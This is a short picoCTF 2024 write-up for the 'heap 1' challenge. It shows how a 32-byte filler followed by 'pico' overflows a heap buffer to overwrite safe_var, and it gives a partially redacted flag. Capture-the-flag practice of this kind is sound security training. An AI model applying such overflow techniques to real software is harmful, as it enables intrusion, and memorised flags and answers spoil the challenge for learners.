picoCTF Solutions
picoCTF 2024Binary ExploitationMedium

heap 1

Published: April 3, 2024Updated: December 9, 2025

Description

Can you control your overflow?

Setup

Remote only

Connect to the remote instance at tethys.picoctf.net <PORT_FROM_INSTANCE>.

Explore the menu options; they mirror heap0 (print/write/inspect safe_var/print flag).

nc tethys.picoctf.net <PORT_FROM_INSTANCE>

Solution

This builds on heap 0 by requiring a specific string instead of just zeroing. After mastering this, progress to heap 2 for function pointer overwrites and heap 3 for use-after-free exploitation.
  1. Step 1Write up to the boundary
    The buffer still sits 32 bytes before safe_var. Write exactly 32 filler characters (e.g., A) so the next four bytes overwrite safe_var itself.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  2. Step 2Append the magic string
    Append pico immediately after the 32-byte filler when using menu option 2. The null terminator follows pico, leaving safe_var == "pico".
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico
  3. Step 3Print the flag
    Once safe_var contains pico, selecting option 4 prints the flag without further tricks.
    Use option 3 first if you want to confirm safe_var now shows pico, then call option 4.

Flag

picoCTF{starting_to_get_the_hang_c58...}

As soon as safe_var == pico, option 4 prints the flag shown above.